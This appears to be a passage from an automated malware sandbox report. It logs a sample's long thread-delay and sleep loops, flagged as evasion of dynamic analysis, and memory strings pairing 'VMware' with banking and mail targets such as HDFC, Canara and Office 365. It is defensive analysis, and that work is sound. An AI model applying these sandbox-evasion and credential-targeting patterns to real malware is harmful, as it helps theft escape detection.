Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598438 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598188 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597964 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597859 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597750 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597502 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597369 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597123 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596891 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596768 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596641 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596422 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594235 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Window / User API: threadDelayed 7879 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Window / User API: threadDelayed 1956 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944 Thread sleep count: 7879 > 30 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944 Thread sleep count: 1956 > 30 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599323s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -598078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597964s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597502s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597369s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597123s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -597016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596768s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -596094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599323 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598438 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598188 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597964 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597859 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597750 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597502 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597369 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597123 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596891 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596768 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596641 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596422 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 594235 Jump to behavior
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
